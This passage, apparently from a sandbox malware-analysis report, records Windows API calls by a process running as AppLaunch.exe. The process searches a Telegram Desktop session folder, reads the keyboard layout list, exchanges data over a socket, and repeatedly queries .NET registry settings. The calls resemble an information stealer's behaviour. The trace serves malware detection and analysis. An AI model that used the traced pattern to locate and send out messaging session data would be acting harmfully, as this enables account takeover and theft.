nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0225.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efb0) returned 1 [0225.842] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x36edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0225.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f284) returned 1 [0225.842] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", nBufferLength=0x105, lpBuffer=0x36ed64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata", lpFilePart=0x0) returned 0x39 [0225.842] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Telegram Desktop\\tdata\\*", lpFindFileData=0x36f034 | out: lpFindFileData=0x36f034*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0225.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff4) returned 1 [0225.849] CoCreateGuid (in: pguid=0x36efb4 | out: pguid=0x36efb4*(Data1=0x3abd1dc8, Data2=0x88a7, Data3=0x4644, Data4=([0]=0xaf, [1]=0x14, [2]=0xd9, [3]=0xc9, [4]=0xaf, [5]=0xf9, [6]=0xda, [7]=0x18))) returned 0x0 [0225.849] CoCreateGuid (in: pguid=0x36eef8 | out: pguid=0x36eef8*(Data1=0xf145e637, Data2=0x3644, Data3=0x4a3e, Data4=([0]=0x9a, [1]=0x5c, [2]=0x90, [3]=0x57, [4]=0xe6, [5]=0x61, [6]=0x3e, [7]=0xf6))) returned 0x0 [0225.888] send (s=0x264, buf=0x3740137*, len=167, flags=0) returned 167 [0225.902] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 132 [0225.948] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0225.949] GetKeyboardLayoutList (in: nBuff=1, lpList=0x25784ac | out: lpList=0x25784ac) returned 1 [0225.972] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x15eb1457, Data2=0x5eaf, Data3=0x45b0, Data4=([0]=0xa8, [1]=0xc6, [2]=0xcf, [3]=0xd1, [4]=0xd2, [5]=0x8, [6]=0x2a, [7]=0x32))) returned 0x0 [0225.972] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xe862255b, Data2=0xe7f1, Data3=0x46db, Data4=([0]=0x8d, [1]=0xa, [2]=0xef, [3]=0x8c, [4]=0xe5, [5]=0x4c, [6]=0x9e, [7]=0xbe))) returned 0x0 [0225.973] send (s=0x264, buf=0x3740137*, len=198, flags=0) returned 198 [0225.973] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0226.003] CoCreateGuid (in: pguid=0x36f004 | out: pguid=0x36f004*(Data1=0xf0b1b0ab, Data2=0x62e2, Data3=0x469d, Data4=([0]=0xa9, [1]=0xf2, [2]=0xbd, [3]=0xd8, [4]=0x31, [5]=0x1, [6]=0x50, [7]=0x9d))) returned 0x0 [0226.003] CoCreateGuid (in: pguid=0x36ef48 | out: pguid=0x36ef48*(Data1=0x7a5eb297, Data2=0xbb56, Data3=0x46bb, Data4=([0]=0xb9, [1]=0xfc, [2]=0x22, [3]=0x2f, [4]=0xce, [5]=0x9c, [6]=0x6f, [7]=0xf6))) returned 0x0 [0226.003] send (s=0x264, buf=0x24230db*, len=157, flags=0) returned 157 [0226.004] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 112 [0226.096] CoCreateGuid (in: pguid=0x36efcc | out: pguid=0x36efcc*(Data1=0xf47710fe, Data2=0xfae1, Data3=0x4c21, Data4=([0]=0x8d, [1]=0xe0, [2]=0xb8, [3]=0x70, [4]=0x26, [5]=0x7c, [6]=0x98, [7]=0x98))) returned 0x0 [0226.096] CoCreateGuid (in: pguid=0x36ef10 | out: pguid=0x36ef10*(Data1=0x244d0e6e, Data2=0xd2dd, Data3=0x485f, Data4=([0]=0xb1, [1]=0xd8, [2]=0xb6, [3]=0xd5, [4]=0x4, [5]=0xab, [6]=0x54, [7]=0xb9))) returned 0x0 [0226.097] send (s=0x264, buf=0x24230db*, len=567, flags=0) returned 567 [0226.098] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 381 [0226.370] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x250 [0226.370] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x260 [0226.378] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e494 | out: phkResult=0x36e494*=0x354) returned 0x0 [0226.378] RegQueryValueExW (in: hKey=0x354, lpValueName="InstallationType", lpReserved=0x0, lpType=0x36e4b4, lpData=0x0, lpcbData=0x36e4b0*=0x0 | out: lpType=0x36e4b4*=0x1, lpData=0x0, lpcbData=0x36e4b0*=0xe) returned 0x0 [0226.378] RegQueryValueExW (in: hKey=0x354, lpValueName="InstallationType", lpReserved=0x0, lpType=0x36e4b4, lpData=0x25833ec, lpcbData=0x36e4b0*=0xe | out: lpType=0x36e4b4*=0x1, lpData="Client", lpcbData=0x36e4b0*=0xe) returned 0x0 [0226.378] RegCloseKey (hKey=0x354) returned 0x0 [0226.384] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f260 | out: phkResult=0x36f260*=0x354) returned 0x0 [0226.384] RegQueryValueExW (in: hKey=0x354, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x36f27c, lpData=0x0, lpcbData=0x36f278*=0x0 | out: lpType=0x36f27c*=0x0, lpData=0x0, lpcbData=0x36f278*=0x0) returned 0x2 [0226.384] RegCloseKey (hKey=0x354) returned 0x0 [0226.387] GetCurrentProcessId () returned 0xec4 [0226.391] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.461] EnumProcessModules (in: hProcess=0x354, lphModule=0x2583bdc, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x2583bdc, lpcbNeeded=0x36f26c) returned 1 [0226.463] EnumProcessModules (in: hProcess=0x354, lphModule=0x2583ce8, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x2583ce8, lpcbNeeded=0x36f26c) returned 1 [0226.466] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x2583f28, cb=0xc | out: lpmodinfo=0x2583f28*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.467] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.467] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.467] CoTaskMemFree (pv=0x5e94a58) [0226.468] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.468] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.468] CoTaskMemFree (pv=0x5e94a58) [0226.468] CloseHandle (hObject=0x354) returned 1 [0226.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.470] RegQueryValueExW (in: hKey=0x354, lpValueName="UseHttpPipeliningAndBufferPooling", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.470] RegCloseKey (hKey=0x354) returned 0x0 [0226.471] GetCurrentProcessId () returned 0xec4 [0226.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.471] EnumProcessModules (in: hProcess=0x354, lphModule=0x25868bc, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x25868bc, lpcbNeeded=0x36f26c) returned 1 [0226.473] EnumProcessModules (in: hProcess=0x354, lphModule=0x25869c8, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x25869c8, lpcbNeeded=0x36f26c) returned 1 [0226.474] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x2586c08, cb=0xc | out: lpmodinfo=0x2586c08*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.474] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.474] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.475] CoTaskMemFree (pv=0x5e94a58) [0226.475] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.475] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.475] CoTaskMemFree (pv=0x5e94a58) [0226.475] CloseHandle (hObject=0x354) returned 1 [0226.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.476] RegQueryValueExW (in: hKey=0x354, lpValueName="UseSafeSynchronousClose", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.476] RegCloseKey (hKey=0x354) returned 0x0 [0226.477] GetCurrentProcessId () returned 0xec4 [0226.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.477] EnumProcessModules (in: hProcess=0x354, lphModule=0x25895ac, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x25895ac, lpcbNeeded=0x36f26c) returned 1 [0226.478] EnumProcessModules (in: hProcess=0x354, lphModule=0x25896b8, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x25896b8, lpcbNeeded=0x36f26c) returned 1 [0226.480] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x25898f8, cb=0xc | out: lpmodinfo=0x25898f8*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.480] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.480] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.480] CoTaskMemFree (pv=0x5e94a58) [0226.480] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.480] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.481] CoTaskMemFree (pv=0x5e94a58) [0226.481] CloseHandle (hObject=0x354) returned 1 [0226.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.482] RegQueryValueExW (in: hKey=0x354, lpValueName="UseStrictRfcInterimResponseHandling", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.482] RegCloseKey (hKey=0x354) returned 0x0 [0226.482] GetCurrentProcessId () returned 0xec4 [0226.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.482] EnumProcessModules (in: hProcess=0x354, lphModule=0x258c270, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x258c270, lpcbNeeded=0x36f26c) returned 1 [0226.484] EnumProcessModules (in: hProcess=0x354, lphModule=0x258c37c, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x258c37c, lpcbNeeded=0x36f26c) returned 1 [0226.485] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x258c5bc, cb=0xc | out: lpmodinfo=0x258c5bc*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.485] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.485] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.486] CoTaskMemFree (pv=0x5e94a58) [0226.486] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.486] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.486] CoTaskMemFree (pv=0x5e94a58) [0226.486] CloseHandle (hObject=0x354) returned 1 [0226.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.487] RegQueryValueExW (in: hKey=0x354, lpValueName="AllowDangerousUnicodeDecompositions", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.487] RegCloseKey (hKey=0x354) returned 0x0 [0226.488] GetCurrentProcessId () returned 0xec4 [0226.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.488] EnumProcessModules (in: hProcess=0x354, lphModule=0x258eeb4, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x258eeb4, lpcbNeeded=0x36f26c) returned 1 [0226.569] EnumProcessModules (in: hProcess=0x354, lphModule=0x258efc0, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x258efc0, lpcbNeeded=0x36f26c) returned 1 [0226.570] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x258f200, cb=0xc | out: lpmodinfo=0x258f200*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.571] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.571] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.571] CoTaskMemFree (pv=0x5e94a58) [0226.571] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.571] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.571] CoTaskMemFree (pv=0x5e94a58) [0226.571] CloseHandle (hObject=0x354) returned 1 [0226.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.572] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.572] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.572] RegQueryValueExW (in: hKey=0x354, lpValueName="UseStrictIPv6AddressParsing", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.572] RegCloseKey (hKey=0x354) returned 0x0 [0226.573] GetCurrentProcessId () returned 0xec4 [0226.573] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.573] EnumProcessModules (in: hProcess=0x354, lphModule=0x2591ae8, cb=0x100, lpcbNeeded=0x36f26c | out: lphModule=0x2591ae8, lpcbNeeded=0x36f26c) returned 1 [0226.574] EnumProcessModules (in: hProcess=0x354, lphModule=0x2591bf4, cb=0x200, lpcbNeeded=0x36f26c | out: lphModule=0x2591bf4, lpcbNeeded=0x36f26c) returned 1 [0226.576] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x2591e34, cb=0xc | out: lpmodinfo=0x2591e34*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.576] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.576] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.576] CoTaskMemFree (pv=0x5e94a58) [0226.576] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.577] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.577] CoTaskMemFree (pv=0x5e94a58) [0226.577] CloseHandle (hObject=0x354) returned 1 [0226.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x0) returned 0x2 [0226.578] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.578] RegQueryValueExW (in: hKey=0x354, lpValueName="AllowAllUriEncodingExpansion", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.578] RegCloseKey (hKey=0x354) returned 0x0 [0226.585] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.585] RegQueryValueExW (in: hKey=0x354, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.585] RegCloseKey (hKey=0x354) returned 0x0 [0226.586] GetCurrentProcessId () returned 0xec4 [0226.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.586] EnumProcessModules (in: hProcess=0x354, lphModule=0x2595778, cb=0x100, lpcbNeeded=0x36f268 | out: lphModule=0x2595778, lpcbNeeded=0x36f268) returned 1 [0226.587] EnumProcessModules (in: hProcess=0x354, lphModule=0x2595884, cb=0x200, lpcbNeeded=0x36f268 | out: lphModule=0x2595884, lpcbNeeded=0x36f268) returned 1 [0226.589] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x2595ac4, cb=0xc | out: lpmodinfo=0x2595ac4*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.589] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.589] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.589] CoTaskMemFree (pv=0x5e94a58) [0226.589] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.589] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.590] CoTaskMemFree (pv=0x5e94a58) [0226.590] CloseHandle (hObject=0x354) returned 1 [0226.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.590] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f260 | out: phkResult=0x36f260*=0x0) returned 0x2 [0226.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f260 | out: phkResult=0x36f260*=0x354) returned 0x0 [0226.591] RegQueryValueExW (in: hKey=0x354, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x36f27c, lpData=0x0, lpcbData=0x36f278*=0x0 | out: lpType=0x36f27c*=0x0, lpData=0x0, lpcbData=0x36f278*=0x0) returned 0x2 [0226.591] RegCloseKey (hKey=0x354) returned 0x0 [0226.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f264 | out: phkResult=0x36f264*=0x354) returned 0x0 [0226.592] RegQueryValueExW (in: hKey=0x354, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x36f280, lpData=0x0, lpcbData=0x36f27c*=0x0 | out: lpType=0x36f280*=0x0, lpData=0x0, lpcbData=0x36f27c*=0x0) returned 0x2 [0226.592] RegCloseKey (hKey=0x354) returned 0x0 [0226.592] GetCurrentProcessId () returned 0xec4 [0226.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec4) returned 0x354 [0226.592] EnumProcessModules (in: hProcess=0x354, lphModule=0x2598784, cb=0x100, lpcbNeeded=0x36f268 | out: lphModule=0x2598784, lpcbNeeded=0x36f268) returned 1 [0226.594] EnumProcessModules (in: hProcess=0x354, lphModule=0x2598890, cb=0x200, lpcbNeeded=0x36f268 | out: lphModule=0x2598890, lpcbNeeded=0x36f268) returned 1 [0226.595] GetModuleInformation (in: hProcess=0x354, hModule=0x400000, lpmodinfo=0x2598ad0, cb=0xc | out: lpmodinfo=0x2598ad0*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191e2)) returned 1 [0226.596] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.596] GetModuleBaseNameW (in: hProcess=0x354, hModule=0x400000, lpBaseName=0x5e94a58, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0226.596] CoTaskMemFree (pv=0x5e94a58) [0226.596] CoTaskMemAlloc (cb=0x804) returned 0x5e94a58 [0226.596] GetModuleFileNameExW (in: hProcess=0x354, hModule=0x400000, lpFilename=0x5e94a58, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0226.596] CoTaskMemFree (pv=0x5e94a58) [0226.596] CloseHandle (hObject=0x354) returned 1 [0226.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36ed90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0226.597] 